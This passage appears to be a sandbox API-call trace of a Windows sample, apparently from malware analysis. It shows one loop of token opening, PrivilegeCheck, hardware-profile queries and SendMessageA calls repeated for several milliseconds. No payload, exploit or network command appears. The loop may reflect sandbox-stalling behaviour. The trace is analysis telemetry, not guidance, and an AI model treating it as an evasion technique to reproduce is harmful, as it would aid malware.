Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.911] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.911] GetLastError () returned 0x578 [0016.911] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.911] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.911] GetCurrentThread () returned 0xfffffffe [0016.911] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.911] GetLastError () returned 0x3f0 [0016.911] GetCurrentProcess () returned 0xffffffff [0016.911] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.911] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.911] SetLastError (dwErrCode=0x522) [0016.911] CloseHandle (hObject=0x114) returned 1 [0016.911] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.911] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.911] GetLastError () returned 0x578 [0016.911] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.911] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.911] GetCurrentThread () returned 0xfffffffe [0016.911] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.912] GetLastError () returned 0x3f0 [0016.912] GetCurrentProcess () returned 0xffffffff [0016.912] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.912] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.912] SetLastError (dwErrCode=0x522) [0016.912] CloseHandle (hObject=0x114) returned 1 [0016.912] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.912] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.912] GetLastError () returned 0x578 [0016.912] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.912] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.912] GetCurrentThread () returned 0xfffffffe [0016.912] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.912] GetLastError () returned 0x3f0 [0016.912] GetCurrentProcess () returned 0xffffffff [0016.912] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.912] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.912] SetLastError (dwErrCode=0x522) [0016.912] CloseHandle (hObject=0x114) returned 1 [0016.912] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.912] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.912] GetLastError () returned 0x578 [0016.912] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.912] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.912] GetCurrentThread () returned 0xfffffffe [0016.913] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.913] GetLastError () returned 0x3f0 [0016.913] GetCurrentProcess () returned 0xffffffff [0016.913] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.913] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.913] SetLastError (dwErrCode=0x522) [0016.913] CloseHandle (hObject=0x114) returned 1 [0016.913] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.913] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.913] GetLastError () returned 0x578 [0016.913] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.913] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.913] GetCurrentThread () returned 0xfffffffe [0016.913] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.913] GetLastError () returned 0x3f0 [0016.913] GetCurrentProcess () returned 0xffffffff [0016.913] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.913] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.913] SetLastError (dwErrCode=0x522) [0016.913] CloseHandle (hObject=0x114) returned 1 [0016.913] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.913] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.913] GetLastError () returned 0x578 [0016.913] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.913] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.913] GetCurrentThread () returned 0xfffffffe [0016.914] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.914] GetLastError () returned 0x3f0 [0016.914] GetCurrentProcess () returned 0xffffffff [0016.914] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.914] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.914] SetLastError (dwErrCode=0x522) [0016.914] CloseHandle (hObject=0x114) returned 1 [0016.914] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.914] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.914] GetLastError () returned 0x578 [0016.914] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.914] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.914] GetCurrentThread () returned 0xfffffffe [0016.914] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.914] GetLastError () returned 0x3f0 [0016.914] GetCurrentProcess () returned 0xffffffff [0016.914] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.914] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.914] SetLastError (dwErrCode=0x522) [0016.914] CloseHandle (hObject=0x114) returned 1 [0016.914] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.914] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.914] GetLastError () returned 0x578 [0016.914] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.914] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.915] GetCurrentThread () returned 0xfffffffe [0016.915] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.915] GetLastError () returned 0x3f0 [0016.915] GetCurrentProcess () returned 0xffffffff [0016.915] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.915] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.915] SetLastError (dwErrCode=0x522) [0016.915] CloseHandle (hObject=0x114) returned 1 [0016.915] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.915] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.915] GetLastError () returned 0x578 [0016.915] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.915] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.915] GetCurrentThread () returned 0xfffffffe [0016.915] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.915] GetLastError () returned 0x3f0 [0016.915] GetCurrentProcess () returned 0xffffffff [0016.915] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.915] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.915] SetLastError (dwErrCode=0x522) [0016.915] CloseHandle (hObject=0x114) returned 1 [0016.915] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.915] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.915] GetLastError () returned 0x578 [0016.915] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.916] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.916] GetCurrentThread () returned 0xfffffffe [0016.916] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.916] GetLastError () returned 0x3f0 [0016.916] GetCurrentProcess () returned 0xffffffff [0016.916] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.916] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.916] SetLastError (dwErrCode=0x522) [0016.916] CloseHandle (hObject=0x114) returned 1 [0016.916] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.916] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.916] GetLastError () returned 0x578 [0016.916] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.916] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.916] GetCurrentThread () returned 0xfffffffe [0016.916] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.916] GetLastError () returned 0x3f0 [0016.916] GetCurrentProcess () returned 0xffffffff [0016.916] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.916] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.916] SetLastError (dwErrCode=0x522) [0016.916] CloseHandle (hObject=0x114) returned 1 [0016.916] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.916] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.916] GetLastError () returned 0x578 [0016.916] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.917] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.917] GetCurrentThread () returned 0xfffffffe [0016.917] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.917] GetLastError () returned 0x3f0 [0016.917] GetCurrentProcess () returned 0xffffffff [0016.917] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.917] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.917] SetLastError (dwErrCode=0x522) [0016.917] CloseHandle (hObject=0x114) returned 1 [0016.917] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.917] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.917] GetLastError () returned 0x578 [0016.917] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.917] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.917] GetCurrentThread () returned 0xfffffffe [0016.917] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.917] GetLastError () returned 0x3f0 [0016.917] GetCurrentProcess () returned 0xffffffff [0016.917] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.917] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.917] SetLastError (dwErrCode=0x522) [0016.917] CloseHandle (hObject=0x114) returned 1 [0016.917] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.917] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.917] GetLastError () returned 0x578 [0016.918] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.918] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.918] GetCurrentThread () returned 0xfffffffe [0016.918] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.918] GetLastError () returned 0x3f0 [0016.918] GetCurrentProcess () returned 0xffffffff [0016.918] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.918] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.918] SetLastError (dwErrCode=0x522) [0016.918] CloseHandle (hObject=0x114) returned 1 [0016.918] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.918] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.918] GetLastError () returned 0x578 [0016.918] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.918] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.918] GetCurrentThread () returned 0xfffffffe [0016.918] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.918] GetLastError () returned 0x3f0 [0016.918] GetCurrentProcess () returned 0xffffffff [0016.918] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.918] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.918] SetLastError (dwErrCode=0x522) [0016.918] CloseHandle (hObject=0x114) returned 1 [0016.918] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.918] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.918] GetLastError () returned 0x578 [0016.919] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.919] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.919] GetCurrentThread () returned 0xfffffffe [0016.919] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.919] GetLastError () returned 0x3f0 [0016.919] GetCurrentProcess () returned 0xffffffff [0016.919] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.919] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.919] SetLastError (dwErrCode=0x522) [0016.919] CloseHandle (hObject=0x114) returned 1 [0016.919] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.919] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.919] GetLastError () returned 0x578 [0016.919] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.919] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.919] GetCurrentThread () returned 0xfffffffe [0016.919] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.919] GetLastError () returned 0x3f0 [0016.919] GetCurrentProcess () returned 0xffffffff [0016.919] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.919] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.919] SetLastError (dwErrCode=0x522) [0016.919] CloseHandle (hObject=0x114) returned 1 [0016.919] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.919] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.920] GetLastError () returned 0x578 [0016.920] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.920] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.920] GetCurrentThread () returned 0xfffffffe [0016.920] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.920] GetLastError () returned 0x3f0 [0016.920] GetCurrentProcess () returned 0xffffffff [0016.920] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.920] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.920] SetLastError (dwErrCode=0x522) [0016.920] CloseHandle (hObject=0x114) returned 1 [0016.920] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.920] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.920] GetLastError () returned 0x578 [0016.920] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.920] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.920] GetCurrentThread () returned 0xfffffffe [0016.920] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.920] GetLastError () returned 0x3f0 [0016.920] GetCurrentProcess () returned 0xffffffff [0016.920] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.920] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.920] SetLastError (dwErrCode=0x522) [0016.920] CloseHandle (hObject=0x114) returned 1 [0016.920] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.920] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.921] GetLastError () returned 0x578 [0016.921] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.921] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.921] GetCurrentThread () returned 0xfffffffe [0016.921] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.921] GetLastError () returned 0x3f0 [0016.921] GetCurrentProcess () returned 0xffffffff [0016.921] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.921] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.921] SetLastError (dwErrCode=0x522) [0016.921] CloseHandle (hObject=0x114) returned 1 [0016.921] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.921] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.921] GetLastError () returned 0x578 [0016.921] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.921] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.921] GetCurrentThread () returned 0xfffffffe [0016.921] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.921] GetLastError () returned 0x3f0 [0016.921] GetCurrentProcess () returned 0xffffffff [0016.921] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.921] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.921] SetLastError (dwErrCode=0x522) [0016.921] CloseHandle (hObject=0x114) returned 1 [0016.921] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.922] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.922] GetLastError () returned 0x578 [0016.922] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.922] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.922] GetCurrentThread () returned 0xfffffffe [0016.922] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.922] GetLastError () returned 0x3f0 [0016.922] GetCurrentProcess () returned 0xffffffff [0016.922] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.922] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.922] SetLastError (dwErrCode=0x522) [0016.922] CloseHandle (hObject=0x114) 